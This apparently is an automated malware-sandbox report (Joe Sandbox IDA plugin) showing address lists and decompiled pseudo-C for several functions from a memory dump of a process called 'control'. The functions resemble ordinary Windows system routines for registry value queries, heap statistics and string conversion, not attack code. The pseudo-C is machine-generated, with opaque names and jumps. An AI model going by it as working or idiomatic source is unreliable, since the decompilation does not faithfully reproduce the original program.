0x04d1ebf9
0x04d1ebfc
0x00000000
0x00000000
0x04d1ec02
0x04d1ec08
0x00000000
0x04d1ec08
0x04d1eb53
0x04d1eb53
0x04d1eb56
0x04d1eb56
0x04d1eb59
0x04d1eb5b
0x04d1eb5d
0x04d1eb8d
0x04d1eb8d
0x04d1eb93
0x04d1eb96
0x04d1eb99
0x04d1eb9c
0x04d1eba1
0x04d1eba4
0x04d1eba6
0x04d1ebdc
0x04d1ebdc
0x04d1ebde
0x00000000
0x00000000
0x04d1ebe4
0x00000000
0x00000000
0x04d1ebe6
0x04d1ebe8
0x00000000
0x00000000
0x00000000
0x04d1ebe8
0x04d1eba8
0x04d1ebaf
0x04d1ebaf
0x04d1ebb4
0x04d1ebb6
0x00000000
0x04d1ebb6
0x04d1ebaa
0x04d1ebad
0x00000000
0x00000000
0x00000000
0x04d1ebad
0x04d1eb5f
0x04d1eb65
0x04d1eb65
0x04d1eb68
0x04d1eb6b
0x04d1eb6e
0x04d1eb73
0x04d1eb76
0x04d1eb78
0x04d1ebca
0x04d1ebca
0x04d1ebcc
0x00000000
0x00000000
0x04d1ebce
0x04d1ebd4
0x04d1ebd7
0x00000000
0x04d1ebd7
0x04d1ebd0
0x04d1ebd2
0x00000000
0x00000000
0x00000000
0x04d1ebd2
0x04d1eb7a
0x04d1eb81
0x04d1eb81
0x04d1eb86
0x04d1eb88
0x00000000
0x04d1eb88
0x04d1eb7c
0x04d1eb7f
0x00000000
0x00000000
0x00000000
0x04d1eb7f
0x04d1eb61
0x04d1eb63
0x00000000
0x00000000
0x00000000
0x04d1ebb9
0x04d1ebbc
0x04d1ebbf
0x04d1ebc0
0x04d1ebc3
0x04d1ebc3
0x00000000
0x04cdd00f
0x04cdd01c
0x04cdd04d
0x04cdd04d
0x04cdd039
0x04cdd03d
0x04cdd03d
0x04cdd01e
0x04cdd023
0x04cdd026
0x04cdd029
0x04d1ec10
0x04d1ec18
0x04d1ec1b
0x04d1ec1b
0x04d1ec1e
0x04d1ec20
0x04d1ec22
0x04d1ec6c
0x04d1ec6c
0x04d1ec72
0x04d1ec77
0x04d1ec7c
0x04d1ec81
0x04d1ec84
0x04d1ec86
0x04d1ecb2
0x04d1ecb2
0x04d1ecb4
0x00000000
0x00000000
0x04d1ecba
0x00000000
0x00000000
0x04d1ecc0
0x04d1ecc2
0x00000000
0x00000000
0x00000000
0x04d1ecc8
0x04d1ec88
0x04d1ec8f
0x04d1ec8f
0x04d1ec91
0x00000000
0x04d1ec91
0x04d1ec8a
0x04d1ec8d
0x00000000
0x00000000
0x00000000
0x04d1ec8d
0x04d1ec24
0x04d1ec2a
0x04d1ec2a
0x04d1ec2f
0x04d1ec34
0x04d1ec39
0x04d1ec3c
0x04d1ec3e
0x04d1ec4e
0x04d1ec4e
0x04d1ec50
0x00000000
0x00000000
0x04d1ec56
0x04d1ec60
0x04d1ec60
0x04d1ec66
0x04d1ec68
0x00000000
0x04d1ec68
0x04d1ec58
0x04d1ec5a
0x00000000
0x00000000
0x00000000
0x04d1ec5a
0x04d1ec40
0x04d1ec47
0x04d1ec47
0x04d1ec49
0x00000000
0x04d1ec49
0x04d1ec42
0x04d1ec45
0x00000000
0x00000000
0x00000000
0x04d1ec45
0x04d1ec26
0x04d1ec28
0x00000000
0x00000000
0x00000000
0x04d1ec94
0x04d1ec9a
0x04d1ec9b
0x04d1ec9e
0x04d1eca1
0x04d1eca4
0x04d1eca4
0x04d1ecad
0x04cdd02f
0x04cdd02f
0x04cdd032
0x04cdd034
0x04cdd036
0x00000000
0x04cdd036
0x04cdd009

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0da4a30da677c789c65780269eb013149ae643dad5dfcbb85a585c03315c678
Instruction ID: e178ddb012fe848adac2972f1455b7cbcf87d23608dca349a977e9135f272490
Opcode Fuzzy Hash: a0da4a30da677c789c65780269eb013149ae643dad5dfcbb85a585c03315c678
Instruction Fuzzy Hash: 0E81AB32E00159ABDF14CF58E980BAEBBB2FBC4305F19852ADC16B7350D635B941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04CA6CC0 Relevance: .2, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04CA6CC0(intOrPtr _a4, intOrPtr* _a8, signed int _a12, signed char _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				intOrPtr _v1044;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				void* _v1062;
				void* _v1064;
				signed int _v1068;
				void* _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				intOrPtr _t67;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				signed int _t80;
				signed int _t81;
				signed int _t87;
				signed char _t99;
				void* _t100;
				signed int _t104;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				void* _t110;
				signed int _t111;
				intOrPtr _t113;
				void* _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t119;

				_t119 = (_t117 & 0xfffffff8) - 0x424;
				_v8 =  *0x4dab370 ^ _t119;
				_t99 = _a16;
				_t113 = _a4;
				_v1044 = _t113;
				_v1040 = _a24;
				if(E04CD1D10( &_v1052, _a8) < 0) {
					L4:
					_pop(_t110);
					_pop(_t114);
					_pop(_t100);
					return E04CF4B50(_t63, _t100, _v8 ^ _t119, _t108, _t110, _t114);
				}
				_t65 = _a20;
				if(_t65 >= 0x3f4) {
					_t14 = _t65 + 0xc; // 0x137
					_t115 = _t14;
					L19:
					_t104 =  *( *[fs:0x30] + 0x18);
					__eflags = _t104;
					if(_t104 == 0) {
						L58:
						_t63 = 0xc0000017;
						goto L4;
					}
					_t67 =  *0x4da5d78; // 0x0
					_t69 = E04CC5D90(_t104, _t104, _t67 + 0x180000, _t115);
					_v1068 = _t69;
					__eflags = _t69;
					if(_t69 == 0) {
						goto L58;
					}
					_t111 = _t69;
					_push( &_v1060);
					_push(_t115);
					_push(_t69);
					_push(2);
					_push( &_v1052);
					_push(_v1044);
					_t116 = E04CF2B00();
					__eflags = _t116;
					if(_t116 >= 0) {
						L7:
						_t108 = _a12;
						__eflags = _t108;
						if(_t108 != 0) {
							_t106 = _a20;
							L26:
							_t72 =  *(_t111 + 4);
							__eflags = _t72 - 3;
							if(_t72 == 3) {
								L53:
								__eflags = _t108 - _t72;
								if(_t108 != _t72) {
									L57:
									_t116 = 0xc0000024;
									L15:
									_t73 = _v1056;
									__eflags = _t73;
									if(_t73 != 0) {
										E04CC3BC0( *( *[fs:0x30] + 0x18), 0, _t73);
									}
									_t63 = _t116;
									goto L4;
								}
								_v1060 =  *((intOrPtr*)(_t111 + 8));
								__eflags = _t99;
								if(_t99 == 0) {
									L10:
									_t116 = 0x80000005;
									L11:
									_t107 = _v1040;
									__eflags = _t107;
									if(_t107 == 0) {
										goto L15;
									}
									__eflags = _t116;
									if(_t116 >= 0) {
										L14:
										 *_t107 = _v1060;
										goto L15;
									}
									__eflags = _t116 - 0x80000005;
									if(_t116 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t111 + 8)) - _t106;
								if( *((intOrPtr*)(_t111 + 8)) > _t106) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t111 + 8)));
								L52:
								_t55 = _t111 + 0xc; // 0xc
								_push(_t99);
								E04CF88C0();
								_t119 = _t119 + 0xc;
								goto L11;
							}
							__eflags = _t72 - 7;
							if(_t72 == 7) {
								goto L53;
							}
							__eflags = _t72 - 4;
							if(_t72 != 4) {
								__eflags = _t72 - 0xb;
								if(_t72 != 0xb) {
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										_t80 = 4;
										__eflags = _t108 - _t80;
										if(_t108 != _t80) {
											_t81 =  *((intOrPtr*)(_t111 + 8));
											_v1060 = _t81;
											__eflags = _t81 - _t106;
											if(_t81 > _t106) {
												goto L10;
											}
											_push(_t81);
											goto L52;
										}
										__eflags = _t106 - _t80;
										if(_t106 != _t80) {
											L34:
											_t116 = 0xc0000004;
											goto L15;
										}
										__eflags = _t99 & 0x00000003;
										if((_t99 & 0x00000003) == 0) {
											_v1060 = _t80;
											__eflags = _t99;
											if(__eflags == 0) {
												goto L10;
											}
											_t45 = _t111 + 0xc; // 0xc
											 *((intOrPtr*)(_t119 + 0x1c)) = _t45;
											_v1052 =  *((intOrPtr*)(_t111 + 8));
											_push(_t99);
											 *((short*)(_t119 + 0x1e)) =  *((intOrPtr*)(_t111 + 8));
											_push(0);
											_push( &_v1052);
											_t116 = E04CE07D0(_t99, _t111, _t116, __eflags);
											goto L11;
										}
										_t116 = 0x80000002;
										goto L15;
									}
									_t116 = 0xc0000024;
									goto L11;
								}
								__eflags = _t108 - _t72;
								if(_t108 != _t72) {
									goto L57;
								}
								_t87 = 8;
								__eflags = _t106 - _t87;
								if(_t106 != _t87) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t111 + 8)) - _t87;
								if( *((intOrPtr*)(_t111 + 8)) != _t87) {
									goto L34;
								}
								_v1060 = _t87;
								__eflags = _t99;
								if(_t99 == 0) {
									goto L10;
								}
								 *_t99 =  *((intOrPtr*)(_t111 + 0xc));
								 *((intOrPtr*)(_t99 + 4)) =  *((intOrPtr*)(_t111 + 0x10));
								goto L11;
							}
							__eflags = _t108 - _t72;
							if(_t108 != _t72) {
								goto L57;
							}
							__eflags = _t106 - _t72;
							if(_t106 != _t72) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t111 + 8)) - _t72;
							if( *((intOrPtr*)(_t111 + 8)) != _t72) {
								goto L34;
							}
							_v1060 = _t72;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L10;
							}
							 *_t99 =  *((intOrPtr*)(_t111 + 0xc));
							goto L11;
						}
						_t106 =  *((intOrPtr*)(_t111 + 8));
						__eflags = _t106 - _a20;
						if(_t106 <= _a20) {
							_t108 =  *(_t111 + 4);
							goto L26;
						}
						_v1060 = _t106;
						goto L10;
					}
					__eflags = _t116 - 0x80000005;
					if(_t116 != 0x80000005) {
						goto L15;
					}
					E04CC3BC0( *( *[fs:0x30] + 0x18), 0, _t111);
					L18:
					_t115 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t111 =  &_v1036;
				_push(_t111);
				_push(2);
				_push( &_v1052);
				_push(_t113);
				_t116 = E04CF2B00();
				if(_t116 >= 0) {
					__eflags = 0;
					_v1056 = 0;
					goto L7;
				}
				if(_t116 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x04ca6cc8
0x04ca6cd5
0x04ca6ce3
0x04ca6ce7
0x04ca6cf0
0x04ca6cf5
0x04ca6d00
0x04ca6d40
0x04ca6d47
0x04ca6d48
0x04ca6d49
0x04ca6d54
0x04ca6d54
0x04ca6d02
0x04ca6d0a
0x04ca6d57
0x04ca6d57
0x04d09a29
0x04d09a2f
0x04d09a32
0x04d09a34
0x04d09bd1
0x04d09bd1
0x00000000
0x04d09bd1
0x04d09a3a
0x04d09a47
0x04d09a4c
0x04d09a50
0x04d09a52
0x00000000
0x00000000
0x04d09a5c
0x04d09a5e
0x04d09a5f
0x04d09a60
0x04d09a61
0x04d09a67
0x04d09a68
0x04d09a71
0x04d09a73
0x04d09a75
0x04d099cb
0x04d099cb
0x04d099ce
0x04d099d0
0x04d09a9d
0x04d09aa0
0x04d09aa0
0x04d09aa3
0x04d09aa6
0x04d09ba9
0x04d09ba9
0x04d09bab
0x04d09bc7
0x04d09bc7
0x04d09a05
0x04d09a05
0x04d09a09
0x04d09a0b
0x04d09a19
0x04d09a19
0x04d09a1e
0x00000000
0x04d09a1e
0x04d09bb0
0x04d09bb4
0x04d09bb6
0x04d099e6
0x04d099e6
0x04d099eb
0x04d099eb
0x04d099ef
0x04d099f1
0x00000000
0x00000000
0x04d099f3
0x04d099f5
0x04d099ff
0x04d09a03
0x00000000
0x04d09a03
0x04d099f7
0x04d099fd
0x00000000
0x00000000
0x00000000
0x04d099fd
0x04d09bbc
0x04d09bbf
0x00000000
0x00000000
0x04d09b94
0x04d09b97
0x04d09b97
0x04d09b9b
0x04d09b9c
0x04d09ba1
0x00000000
0x04d09ba1
0x04d09aac
0x04d09aaf
0x00000000
0x00000000
0x04d09ab5
0x04d09ab8
0x04d09aeb
0x04d09aee
0x04d09b20
0x04d09b23
0x04d09b31
0x04d09b32
0x04d09b34
0x04d09b82
0x04d09b85
0x04d09b89
0x04d09b8b
0x00000000
0x00000000
0x04d09b91
0x00000000
0x04d09b91
0x04d09b36
0x04d09b38
0x04d09ae1
0x04d09ae1
0x00000000
0x04d09ae1
0x04d09b3a
0x04d09b3d
0x04d09b49
0x04d09b4d
0x04d09b4f
0x00000000
0x00000000
0x04d09b55
0x04d09b58
0x04d09b60
0x04d09b69
0x04d09b6a
0x04d09b73
0x04d09b75
0x04d09b7b
0x00000000
0x04d09b7b
0x04d09b3f
0x00000000
0x04d09b3f
0x04d09b25
0x00000000
0x04d09b25
0x04d09af0
0x04d09af2
0x00000000
0x00000000
0x04d09afa
0x04d09afb
0x04d09afd
0x00000000
0x00000000
0x04d09aff
0x04d09b02
0x00000000
0x00000000
0x04d09b04
0x04d09b08
0x04d09b0a
0x00000000
0x00000000
0x04d09b13
0x04d09b18
0x00000000
0x04d09b18
0x04d09aba
0x04d09abc
0x00000000
0x00000000
0x04d09ac2
0x04d09ac4
0x00000000
0x00000000
0x04d09ac6
0x04d09ac9
0x00000000
0x00000000
0x04d09acb
0x04d09acf
0x04d09ad1
0x00000000
0x00000000
0x04d09ada
0x00000000
0x04d09ada
0x04d099d6
0x04d099d9
0x04d099dc
0x04d09a98
0x00000000
0x04d09a98
0x04d099e2
0x00000000
0x04d099e2
0x04d09a7b
0x04d09a81
0x00000000
0x00000000
0x04d09a91
0x04d09a25
0x04d09a25
0x00000000
0x04d09a25
0x04ca6d10
0x04ca6d11
0x04ca6d16
0x04ca6d1c
0x04ca6d1d
0x04ca6d23
0x04ca6d24
0x04ca6d2a
0x04ca6d2e
0x04d099c5
0x04d099c7
0x00000000
0x04d099c7
0x04ca6d3a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 049465caff4cd4ab8daa3035cb524b057e8f849f7dd25c097fd21f9a3f8a3a56
Instruction ID: aecbac68469cfa9ea36237f5b8e933c05587375884943526d3631958e0f01fc1
Opcode Fuzzy Hash: 049465caff4cd4ab8daa3035cb524b057e8f849f7dd25c097fd21f9a3f8a3a56
Instruction Fuzzy Hash: 3A719EB1A047429BDB21CF25C8A0B6BB7E5FB84354F05C9AAF955D7281E730F940CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04CEE1A4 Relevance: .2, Instructions: 212
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04CEE1A4(intOrPtr __ecx, signed int __edx) {
				signed int _v8;
				signed int _v16;
				char _v36;
				char _v37;
				signed int _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				char _v84;
				char _v92;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t116;
				signed int _t127;
				signed int _t128;
				signed int _t130;
				signed int _t131;
				signed int _t140;
				void* _t148;
				signed int _t158;
				signed int _t159;
				intOrPtr _t161;
				intOrPtr _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				intOrPtr _t172;
				signed int _t174;
				signed int _t187;

				_t162 = __edx;
				_t150 = __ecx;
				_v8 =  *0x4dab370 ^ _t174;
				_t172 = __ecx;
				_v37 = __edx;
				_t148 = 0;
				_v72 = __ecx;
				_v48 = 0;
				_v52 = 0;
				if(( *(__ecx + 0xd4) & 0x04000000) != 0) {
					_t162 =  &_v48;
					_t167 = E04D83527(__ecx,  &_v48,  &_v52);
					__eflags = _t167;
					if(_t167 < 0) {
						L16:
						if(_t187 != 0) {
							L27:
							_t148 = E04CDABA0(_t167);
						}
						return E04CF4B50(_t148, _t148, _v8 ^ _t174, _t162, _t167, _t172);
					}
					 *((intOrPtr*)(__ecx + 0x118)) =  *((intOrPtr*)(__ecx + 0x118)) + _v48;
					 *((intOrPtr*)(__ecx + 0x114)) =  *((intOrPtr*)(__ecx + 0x114)) + _v52;
				}
				_t9 = _t172 + 0x14c; // 0x14c
				if( *_t9 == _t9) {
					_t65 = _t172 + 0x154; // 0x154
					_t114 = _t65;
					__eflags =  *_t65 - _t114;
					if( *_t65 != _t114) {
						goto L2;
					}
					__eflags =  *((intOrPtr*)(_t172 + 0x168)) - _t148;
					if( *((intOrPtr*)(_t172 + 0x168)) != _t148) {
						goto L2;
					}
					__eflags =  *(_t172 + 0xd4) & 0x00001000;
					if(( *(_t172 + 0xd4) & 0x00001000) != 0) {
						goto L2;
					}
					_push(3);
					_push(0x18);
					_push( &_v36);
					_push( &_v92);
					_push( *((intOrPtr*)(_t172 + 0x68)));
					_t167 = E04CF2E40();
					__eflags = _t167;
					if(_t167 < 0) {
						goto L16;
					}
					_t74 = _v16 + 3; // 0x3
					_t168 = _t74 &  ~_v16;
					L3:
					_v44 = _t168;
					_t116 = E04CC5D90(_t150,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t168);
					_v56 = _t116;
					if(_t116 == 0) {
						_t167 = 0xc0000017;
						goto L27;
					}
					_push(_t148);
					_v84 = _t148;
					_push( &_v84);
					_push(_t168);
					_push(_t116);
					_v80 = _t148;
					_push( &_v92);
					_push(_t148);
					_push(_t148);
					_push(_t148);
					_push( *((intOrPtr*)(_t172 + 0x68)));
					_t167 = E04CF29F0();
					if(_t167 < 0) {
						L15:
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t148, _v56);
						_t187 = _t167;
						goto L16;
					}
					_t169 = _v56;
					_t154 = _v44;
					if(_v44 >=  *_t169) {
						_t154 =  *_t169;
						_v44 =  *_t169;
					}
					if(_v37 != _t148) {
						L12:
						 *((intOrPtr*)(_t169 + 0x30)) =  *((intOrPtr*)(_t169 + 4));
						E04CEE330( *((intOrPtr*)(_t169 + 4)), _t172, _t169, _v44);
						_t162 = _t169;
						E04CF0EC6(_t172, _t169, _v44);
						_push(_t148);
						_push( &_v84);
						_push(_v44);
						_push(_t169);
						_push( &_v92);
						_push(_t148);
						_push(_t148);
						_push(_t148);
						_push( *((intOrPtr*)(_t172 + 0x68)));
						_t167 = E04CF2A10();
						if(_v37 == 0 && _t167 >= 0) {
							_t127 =  *(_t172 + 0xd4);
							if((_t127 & 0x04000020) != 0) {
								__eflags = _t127 & 0x04000000;
								if((_t127 & 0x04000000) == 0) {
									__eflags = _t127 & 0x00002000;
									_t128 =  *(_t172 + 0xd0);
									_t158 = 0x400;
									if((_t127 & 0x00002000) == 0) {
										_t158 = 0x100000;
									}
									_t159 = _t128 * _t158;
									_v48 = _t128 * _t158 >> 0x20;
									_t130 =  *(_t172 + 0x118);
									_t162 = _t130 *  *(_t172 + 0x8c) >> 0x20;
									_t131 = _t130 *  *(_t172 + 0x8c);
									__eflags = _t162 - _v48;
									if(__eflags > 0) {
										goto L15;
									} else {
										if(__eflags < 0) {
											L37:
											_v68 = _t131;
											__eflags = _t131 | _t162;
											_v64 = _t162;
											if((_t131 | _t162) != 0) {
												_push(0x14);
												_push(8);
												_push( &_v68);
												_push( &_v100);
												_push( *((intOrPtr*)(_t172 + 0x68)));
												_t167 = E04CF2C20();
											}
											goto L15;
										}
										__eflags = _t131 - _t159;
										if(_t131 >= _t159) {
											goto L15;
										}
										goto L37;
									}
								}
								_t131 =  *(_t172 + 0xf8);
								_t162 =  *(_t172 + 0xfc);
								goto L37;
							}
						}
						goto L15;
					}
					 *((intOrPtr*)(_t169 + 0x74)) =  *((intOrPtr*)(_t172 + 0x88));
					 *(_t169 + 0x8c) =  *(_t172 + 0x118);
					 *((intOrPtr*)(_t169 + 0x98)) =  *((intOrPtr*)(_t169 + 0x98)) +  *((intOrPtr*)(_t172 + 0x110));
					 *((intOrPtr*)(_t169 + 0x174)) =  *((intOrPtr*)(_t169 + 0x174)) +  *((intOrPtr*)(_t172 + 0x114));
					_t140 =  *(_t172 + 0xd4);
					if((_t140 & 0x00010000) != 0) {
						__eflags = _t140 & 0x00001000;
						if((_t140 & 0x00001000) != 0) {
							E04D82AF0(_t172, _t169, _t154, _v48, _v52);
						}
						goto L12;
					}
					while(1) {
						_t161 =  *0x7ffe0018;
						_t166 =  *0x7FFE0014;
						if(_t161 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t169 = _v56;
					_t148 = 0;
					_t172 = _v72;
					 *((intOrPtr*)(_t169 + 0x78)) = _t166;
					 *((intOrPtr*)(_t169 + 0x7c)) = _t161;
					goto L12;
				}
				L2:
				_t168 =  *(_t172 + 0x8c);
				goto L3;
			}

0x04cee1a4
0x04cee1a4
0x04cee1b3
0x04cee1b8
0x04cee1ba
0x04cee1bd
0x04cee1bf
0x04cee1c3
0x04cee1d0
0x04cee1d3
0x04d28dd3
0x04d28ddb
0x04d28ddd
0x04d28ddf
0x04cee312
0x04cee312
0x04d28e58
0x04d28e5e
0x04d28e5e
0x04cee328
0x04cee328
0x04d28de8
0x04d28df1
0x04d28df1
0x04cee1d9
0x04cee1e1
0x04d28dfc
0x04d28dfc
0x04d28e02
0x04d28e04
0x00000000
0x00000000
0x04d28e0a
0x04d28e10
0x00000000
0x00000000
0x04d28e16
0x04d28e20
0x00000000
0x00000000
0x04d28e26
0x04d28e28
0x04d28e2d
0x04d28e31
0x04d28e32
0x04d28e3a
0x04d28e3c
0x04d28e3e
0x00000000
0x00000000
0x04d28e47
0x04d28e4c
0x04cee1ed
0x04cee1f6
0x04cee1fc
0x04cee201
0x04cee206
0x04d28e53
0x00000000
0x04d28e53
0x04cee20c
0x04cee210
0x04cee213
0x04cee214
0x04cee215
0x04cee219
0x04cee21c
0x04cee21d
0x04cee21e
0x04cee21f
0x04cee220
0x04cee228
0x04cee22c
0x04cee2fe
0x04cee30b
0x04cee310
0x00000000
0x04cee310
0x04cee232
0x04cee235
0x04cee23a
0x04cee23c
0x04cee23e
0x04cee23e
0x04cee244
0x04cee2ab
0x04cee2b5
0x04cee2b8
0x04cee2c0
0x04cee2c4
0x04cee2c9
0x04cee2cd
0x04cee2ce
0x04cee2d4
0x04cee2d5
0x04cee2d6
0x04cee2d7
0x04cee2d8
0x04cee2d9
0x04cee2e5
0x04cee2e7
0x04cee2ed
0x04cee2f8
0x04d28e85
0x04d28e8a
0x04d28ea0
0x04d28ea5
0x04d28ea7
0x04d28eac
0x04d28eae
0x04d28eae
0x04d28eb5
0x04d28eb7
0x04d28eba
0x04d28ec0
0x04d28ec0
0x04d28ec6
0x04d28ec9
0x00000000
0x04d28ecf
0x04d28ecf
0x04d28ed9
0x04d28ed9
0x04d28edc
0x04d28ede
0x04d28ee1
0x04d28ee7
0x04d28ee9
0x04d28eee
0x04d28ef2
0x04d28ef3
0x04d28efb
0x04d28efb
0x00000000
0x04d28ee1
0x04d28ed1
0x04d28ed3
0x00000000
0x00000000
0x00000000
0x04d28ed3
0x04d28ec9
0x04d28e8c
0x04d28e92
0x00000000
0x04d28e92
0x04cee2f8
0x00000000
0x04cee2e7
0x04cee24c
0x04cee255
0x04cee261
0x04cee26d
0x04cee273
0x04cee27e
0x04d28e65
0x04d28e6a
0x04d28e7b
0x04d28e7b
0x00000000
0x04d28e6a
0x04cee28f
0x04cee28f
0x04cee291
0x04cee297
0x00000000
0x00000000
0x04cee329
0x04cee329
0x04cee29d
0x04cee2a0
0x04cee2a2
0x04cee2a5
0x04cee2a8
0x00000000
0x04cee2a8
0x04cee1e7
0x04cee1e7
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f29bcb9cef5624584a33df8b7f4ce65a7f32ae4d55f4429252ad68d075e50f26
Instruction ID: 6fcf3dfab1f05717a22d23d85acae00a3bd6d1819decd095fb2a2142c54fb8a5
Opcode Fuzzy Hash: f29bcb9cef5624584a33df8b7f4ce65a7f32ae4d55f4429252ad68d075e50f26
Instruction Fuzzy Hash: B6819D71A00609AFEB21DFA5C880BEEB7FAFF48354F144429E556A7210EB31BD45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04CCC560 Relevance: .2, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04CCC560(signed short* _a4, signed short* _a8, char _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* _v29;
				signed int _v36;
				unsigned int _v40;
				intOrPtr _v44;
				signed short _v48;
				signed char* _v52;
				signed int _v56;
				signed short _v60;
				signed int _v64;
				unsigned int _v68;
				signed short _v72;
				intOrPtr _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				intOrPtr _t78;
				signed short _t79;
				signed short _t81;
				signed char _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t93;
				signed int _t96;
				signed int _t98;
				signed short* _t100;
				signed char* _t102;
				signed char* _t103;
				signed int _t104;
				signed int _t105;
				signed short _t106;
				signed short _t112;
				intOrPtr _t113;
				void* _t119;
				char _t120;
				signed int _t121;
				unsigned int _t122;
				unsigned int _t124;
				signed char* _t126;
				signed short* _t128;
				signed short _t129;
				signed int _t133;
				signed int _t135;
				intOrPtr _t137;
				signed int _t138;
				void* _t142;
				void* _t148;

				_push(0xfffffffe);
				_push(0x4d8c248);
				_push(E04CFAD20);
				_push( *[fs:0x0]);
				_t73 =  *0x4dab370;
				_v12 = _v12 ^ _t73;
				_push(_t73 ^ _t138);
				 *[fs:0x0] =  &_v20;
				_t100 = _a8;
				_t133 =  *_t100 & 0x0000ffff;
				_t126 = _t100[2];
				_t104 = 0;
				_t120 =  *0x4da3921; // 0x0
				_v29 = _t120;
				if(_t120 != 0) {
					if(_t133 != 0) {
						E04CDD210(0, 0,  &_v36, _t126, _t133);
						_t105 = _v36;
						L4:
						_t106 = _t105 + 2;
						if(_t106 > 0xfffe) {
							_t78 = 0xc00000f0;
							L17:
							 *[fs:0x0] = _v20;
							return _t78;
						}
						_t121 = _t106 & 0x0000ffff;
						_t9 = _t121 - 2; // 0x3fffffe
						_t79 = _t9;
						_t128 = _a4;
						 *_t128 = _t79;
						if(_a12 != 0) {
							_t128[1] = _t121;
							_t81 = E04CC5D90(_t106,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t106);
							_t128[2] = _t81;
							if(_t81 == 0) {
								_t78 = 0xc0000017;
								goto L17;
							}
							_t82 =  *0x4da3921; // 0x0
							L9:
							_v44 = 0;
							_v8 = 0;
							_v76 = 1;
							_t135 =  *_t100 & 0x0000ffff;
							_v56 = _t135;
							_t102 = _t100[2];
							_v52 = _t102;
							_t122 =  *_t128 & 0x0000ffff;
							_t129 = _t128[2];
							_v48 = _t129;
							_t83 = _t82 & 0x000000ff;
							if(_t83 != 0) {
								if(_t135 != 0) {
									E04CDD210(_t129, _t122,  &_v40, _t102, _t135);
								} else {
									_v40 = _t135;
								}
								L16:
								_v44 = 0;
								 *((short*)(_a4[2] + (_v40 >> 1) * 2)) = 0;
								_v44 = 0;
								_v8 = 0xfffffffe;
								_v76 = 0;
								E04CCC6DB(_a4[2], _a4, 0);
								_t78 = 0;
								goto L17;
							}
							_t124 = _t122 >> 1;
							_v68 = _t124;
							_t148 =  *0x4da6930 - _t83; // 0x0
							if(_t148 != 0) {
								_v72 = _t129;
								while(_t124 != 0 && _t135 != 0) {
									_t124 = _t124 - 1;
									_v68 = _t124;
									_t135 = _t135 - 1;
									_v56 = _t135;
									_t89 =  *_t102 & 0x000000ff;
									_v36 =  *(0x4da4b00 + _t89 * 2) & 0x0000ffff;
									_t56 = _t129 + 2; // 0x4cfad22
									_t112 = _t56;
									_v60 = _t112;
									if(_v36 == 0) {
										_t113 =  *0x4da6920; // 0x7f54001c
										_t90 =  *((intOrPtr*)(_t113 + _t89 * 2));
										_t102 =  &(_t102[1]);
										L44:
										 *_t129 = _t90;
										_t129 = _v60;
										_v52 = _t102;
										_v48 = _t129;
										continue;
									}
									if(_t135 != 0) {
										_t103 =  &(_t102[1]);
										_v52 = _t103;
										_t93 =  *0x4da6928; // 0x0
										_t90 =  *((intOrPtr*)(_t93 + (( *_t103 & 0x000000ff) + (_v36 & 0x0000ffff)) * 2));
										_t102 =  &(_t103[1]);
										_t135 = _t135 - 1;
										_v56 = _t135;
										goto L44;
									}
